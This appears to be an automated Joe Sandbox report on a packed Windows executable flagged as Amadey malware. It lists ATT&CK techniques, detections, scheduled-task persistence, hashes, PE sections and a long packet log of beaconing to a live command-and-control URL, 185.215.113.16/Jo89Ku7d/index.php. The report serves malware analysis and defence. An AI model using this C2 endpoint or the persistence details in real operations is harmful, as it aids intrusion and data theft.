                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                    | Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 741 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                    | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction |
                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 224 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                    [Behavior graph: ID 1519874, Sample: file.exe, Startdate: 27/09/2024, Architecture: WINDOWS, Score: 100]

                    | Source | Detection | Scanner | Label | Link |
                    | file.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
                    | file.exe | 100% | Joe Sandbox ML | | |
                    | Source | Detection | Scanner | Label | Link |
                    | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
                    | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | | |
                    | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 53% | ReversingLabs | Win32.Packed.Themida | |
                    No Antivirus matches
                    No Antivirus matches
                    | Source | Detection | Scanner | Label | Link |
                    No contacted domains info
                    | Name | Malicious | Antivirus Detection | Reputation |
                    | http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: phishing | unknown |
                    | Name | Source | Malicious | Antivirus Detection | Reputation |
                    | IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
                    | 185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true |
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1519874
                    Start date and time:2024-09-27 01:41:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 3392 because there are no executed function
                    • Execution Graph export aborted for target axplong.exe, PID 6704 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 1012 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    | Time | Type | Description |
                    | 01:42:09 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe |
                    | 19:43:01 | API Interceptor | 576390x Sleep call for process: axplong.exe modified |
                    | Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey, DarkTortilla | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey, Stealc, Vidar | | 185.215.113.16/Jo89Ku7d/index.php |
                    | 185.215.113.16 | file.exe | | malicious | Amadey | | 185.215.113.16/Jo89Ku7d/index.php |
                    No context
                    | Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Stealc | | 185.215.113.37 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Amadey | | 185.215.113.16 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Amadey | | 185.215.113.16 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Stealc | | 185.215.113.37 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Stealc | | 185.215.113.37 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Amadey | | 185.215.113.16 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Amadey, DarkTortilla | | 185.215.113.16 |
                    | WHOLESALECONNECTIONSNL | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37 |
                    No context
                    No context
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1874944
                    Entropy (8bit):7.950054398309737
                    Encrypted:false
                    SSDEEP:49152:YjBUKhKl0VrRLsa7d/yVaFHd25wLSEC3ymriMz:Yj/KlYRQa7dyVuw5wLSE6ymriM
                    MD5:B6041E0FE108DB5E8ADDCF6D6B4DA4BF
                    SHA1:4F6D688E4294362965C5E74999CD6F4C24566956
                    SHA-256:E5DB33A91B7E4FD54196DAD1042DF50860DC815FDD1FB88A5E093EA2597CB196
                    SHA-512:7F64D463E9540A3625B5E68B4AFDF4237B0241C144C5FB047D86BFB8491A51F68C34C57566D09B67013B10325A5DA0B04664A30539D125CE6B85438846FA1B95
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 53%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................J...........@.................................W...k............................oJ..............................nJ..................................................... . ............................@....rsrc...............................@....idata ............................@... .@*.........................@...xtqiedmi......0.....................@...pzupkaig......J......v..............@....taggant.0....J.."...z..............@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):3.4695747129185786
                    Encrypted:false
                    SSDEEP:6:JBWQnXAL1UEZ+lX1lOJUPelkDdtkHs+Zgty0lb+Et0:JQQXABQ1lOmeeDOZgtVyEt0
                    MD5:58E5EBC56FC96DC61E4B39B00F562695
                    SHA1:9F3BF527A4889686488B639E5C8F7678DE84CAEF
                    SHA-256:E4F4F72DA831034405F28718317FEB856DEB5904221A11701844FC35DB67EB74
                    SHA-512:27B44F3BAB591C98D68025CEB1B7A2EA3F16F826C092544A0AA23C5DACE0EBE0E33A02B16ED2F9E4295C946B97F2AA05BF66CF21AF6006EABE5ABF6DD4442DD4
                    Malicious:false
                    Reputation:low
                    Preview:.......<.]I.H.....BF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0.................+.@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.950054398309737
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'874'944 bytes
                    MD5:b6041e0fe108db5e8addcf6d6b4da4bf
                    SHA1:4f6d688e4294362965c5e74999cd6f4c24566956
                    SHA256:e5db33a91b7e4fd54196dad1042df50860dc815fdd1fb88a5e093ea2597cb196
                    SHA512:7f64d463e9540a3625b5e68b4afdf4237b0241c144c5fb047d86bfb8491a51f68c34c57566d09b67013b10325a5da0b04664a30539d125ce6b85438846fa1b95
                    SSDEEP:49152:YjBUKhKl0VrRLsa7d/yVaFHd25wLSEC3ymriMz:Yj/KlYRQa7dyVuw5wLSE6ymriM
                    TLSH:8B953321B49F90EED806B0BA6497C82E39724B5EC95D17C489547CB8DBCA13B1C7F622
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x8a9000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F43A4E3F0EAh
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4a6f08 | 0x10 | xtqiedmi
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x4a6eb8 | 0x18 | xtqiedmi
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                     | 0x1000 | 0x68000 | 0x2de00 | bd2057c151075458c7aedb704fc468df | False | 0.997253916893733 | data | 7.98054945395771 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x69000 | 0x1e0 | 0x200 | 91f21286d071da60dd102a503e19a88b | False | 0.576171875 | data | 4.523325782322513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                     | 0x6b000 | 0x2a4000 | 0x200 | ab1aa15112a11f3215656af86fbf8d94 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    xtqiedmi | 0x30f000 | 0x199000 | 0x198200 | eba1114542d968ae0b16998934f10253 | False | 0.9943757178407351 | data | 7.9531674604718186 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    pzupkaig | 0x4a8000 | 0x1000 | 0x400 | feff11feb3d4497e7db4408f02ede44b | False | 0.7890625 | data | 6.245089353943212 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant | 0x4a9000 | 0x3000 | 0x2200 | 42b1e9da512124e19536ffb83a6b0b77 | False | 0.06387867647058823 | DOS executable (COM) | 0.7244750831980244 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_MANIFEST | 0x4a6f18 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                    DLL | Import
                    kernel32.dll | lstrcpy
                    Language of compilation system | Country where language is spoken | Map
                    English | United States |
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-09-27T01:43:10.768696+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.8 | 49716 | 185.215.113.16 | 80 | TCP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Sep 27, 2024 01:43:29.698048115 CEST4973680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:29.701139927 CEST8049735185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:29.701194048 CEST4973580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:29.706821918 CEST8049736185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:30.447463036 CEST8049736185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:30.447556019 CEST4973680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.448374033 CEST4973680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.453315973 CEST8049736185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:30.687792063 CEST8049736185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:30.687865973 CEST4973680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.796273947 CEST4973680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.796624899 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.801527023 CEST8049736185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:30.801549911 CEST8049737185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:30.801590919 CEST4973680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.801640034 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.801863909 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:30.806914091 CEST8049737185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:31.491599083 CEST8049737185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:31.491769075 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:31.588385105 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:31.593326092 CEST8049737185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:31.813420057 CEST8049737185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:31.813576937 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.007965088 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.008514881 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.013123989 CEST8049737185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:32.013174057 CEST4973780192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.013325930 CEST8049738185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:32.013417959 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.013638973 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.018441916 CEST8049738185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:32.726602077 CEST8049738185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:32.726795912 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.728928089 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:32.738137960 CEST8049738185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:32.958177090 CEST8049738185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:32.958409071 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.061944008 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.062807083 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.067416906 CEST8049738185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:33.067563057 CEST4973880192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.067635059 CEST8049739185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:33.067783117 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.068240881 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.073143959 CEST8049739185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:33.761631966 CEST8049739185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:33.761710882 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.762690067 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:33.767432928 CEST8049739185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:33.984903097 CEST8049739185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:33.985080004 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.093425989 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.093796968 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.098705053 CEST8049740185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:34.098778009 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.098839045 CEST8049739185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:34.098896027 CEST4973980192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.099169970 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.103956938 CEST8049740185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:34.806998968 CEST8049740185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:34.807166100 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.922063112 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:34.927031994 CEST8049740185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:35.148251057 CEST8049740185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:35.148332119 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:35.264163017 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:35.264470100 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:35.269166946 CEST8049740185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:35.269244909 CEST4974080192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:35.269484043 CEST8049741185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:35.269561052 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:35.269680023 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:35.274429083 CEST8049741185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:36.005976915 CEST8049741185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:36.006192923 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.006787062 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.011569023 CEST8049741185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:36.233390093 CEST8049741185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:36.233501911 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.343076944 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.343461990 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.348431110 CEST8049742185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:36.348465919 CEST8049741185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:36.348602057 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.348680973 CEST4974180192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.348828077 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:36.353615999 CEST8049742185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:37.047596931 CEST8049742185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:37.047723055 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.048603058 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.053380013 CEST8049742185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:37.275119066 CEST8049742185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:37.275333881 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.435772896 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.436536074 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.441073895 CEST8049742185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:37.441152096 CEST4974280192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.441351891 CEST8049743185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:37.441515923 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.464751959 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:37.469764948 CEST8049743185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:38.176256895 CEST8049743185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:38.176315069 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.177397966 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.182193041 CEST8049743185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:38.408268929 CEST8049743185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:38.408401966 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.516906977 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.517242908 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.522162914 CEST8049744185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:38.522249937 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.522445917 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.522739887 CEST8049743185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:38.522795916 CEST4974380192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:38.527198076 CEST8049744185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:39.247031927 CEST8049744185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:39.247102976 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.247909069 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.252674103 CEST8049744185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:39.483381987 CEST8049744185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:39.483516932 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.592528105 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.593470097 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.597917080 CEST8049744185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:39.598017931 CEST4974480192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.598390102 CEST8049745185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:39.598618031 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.598860025 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:39.603769064 CEST8049745185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:40.314256907 CEST8049745185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:40.314357042 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.315042973 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.319900036 CEST8049745185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:40.539505959 CEST8049745185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:40.539650917 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.730288029 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.730516911 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.735430956 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:40.735529900 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.735579014 CEST8049745185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:40.735630989 CEST4974580192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.736553907 CEST4974680192.168.2.8185.215.113.16
                    Sep 27, 2024 01:43:40.741578102 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.041127920 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.041161060 CEST8049746185.215.113.16192.168.2.8
                    Sep 27, 2024 01:43:42.041225910 CEST8049746185.215.113.16192.168.2.8
